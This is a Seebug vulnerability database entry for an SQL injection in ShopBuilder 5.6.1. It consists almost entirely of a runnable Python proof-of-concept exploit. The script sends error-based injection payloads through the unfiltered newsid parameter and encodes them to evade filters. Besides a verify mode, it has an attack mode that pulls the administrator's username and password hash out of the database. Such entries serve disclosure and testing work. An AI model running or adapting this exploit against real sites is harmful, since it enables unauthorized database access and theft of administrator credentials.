ShopBuilder 5.6.1 /module/news/admin/news.php SQL注入漏洞

2014-10-28T00:00:00
ID SSV:88924
Type seebug
Reporter Root
Modified 2014-10-28T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding=utf-8

import re
import urllib2

from comm import cmdline
from comm import generic


poc_info = {
    'VulId': '1568',
    'Name': 'ShopBuilder 5.6.1 /module/news/admin/news.php SQL注入漏洞 POC',
    'AppName': 'ShopBuilder',
    'AppPowerLink': 'http://www.shop-builder.cn',
    'AppVersion': '5.6.1',
    'VulType': 'SQL Injection',
    'Desc': '''
            newsid 未经过过滤拼入 SQL 语句,造成 SQL 注入漏洞,可以获取管理员的账号以及密码。
            ''',
    'Author': ['zhengdt @ knownsec'],
    'VulDate': '2014-09-29',
    'CreateDate': '2014-10-10',
    'UpdateDate': '2014-10-10',
    'References': ['http://wooyun.org/bugs/wooyun-2014-072822'],
    'Version': '1',
}


io_info = {
    'URL': '',
    'Mode': 'v',
    'Verbose': False,
    'Error': '',
    'Status': 0,
    'Result': {}
}


def main(io_info):
    url = io_info.get('URL', '')
    mode = io_info.get('Mode', 'v')
    verbose = io_info.get('Verbose', False)
    headers_fake = generic.modify_headers(io_info)

    vul_url = '%s/?m=news/admin&s=news&' % url

    if mode == 'v':
        try:
            payload = 'newsid=11%20and%201=(select%201%20from(select%20count(*),concat((select%20(select%20(s' \
                      'elect%20md5(1513644312)))%20from%20information_schema.tables%20limit%200,1),floor(r' \
                      'and(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)'
            payload = payload.replace('select', '%73elect').replace('(', '%28').replace(')', '%29')
            if verbose:
                print '[*] %s - Executing payload ...' % url
            response = urllib2.urlopen(urllib2.Request(vul_url + payload, headers=headers_fake)).read()

            if '4be0d4871abae85cae972cd885f5b1e9' in response:  
                io_info['Status'] = 1
                io_info['Result']['VerifyInfo'] = {}
                io_info['Result']['VerifyInfo']['URL'] = url

        except Exception, e:
            io_info['Error'] = '[*] %s' % str(e)
            return

    if mode == 'a':
        try:
            payload = 'newsid=11%20and%201=(select%201%20from(select%20count(*),concat((select%20(select%20(se' \
                      'lect%20concat(user,0x3a,password)%20from%20mallbuilder_admin%20limit%201))%20from%20' \
                      'information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_sch'\
                      'ema.tables%20group%20by%20x)a)'
            payload = payload.replace('select', '%73elect').replace('(', '%28').replace(')', '%29')
            match_data = re.compile('Duplicate entry \'(.*):([\w\d]{32})1\'')

            if verbose:
                print '[*] %s - Executing payload ...' % url
            response = urllib2.urlopen(urllib2.Request(vul_url + payload, headers=headers_fake)).read()

            if verbose:
                print '[*] %s - Get username and password of admin ...' % url

            username, password = match_data.findall(response)[0]

            if username and password:  
                io_info['Status'] = 1
                io_info['Result']['AdminInfo'] = {}
                io_info['Result']['AdminInfo']['Username'] = username
                io_info['Result']['AdminInfo']['Password'] = password

        except Exception, e:
            io_info['Error'] = '[*] %s' % str(e)
            return


if __name__ == "__main__":
    cmdline.main(io_info, usage='', argvs=[])
    if io_info['Verbose']:
        print '\n[*] Init ...\n'
    main(io_info)
    print generic.output(io_info)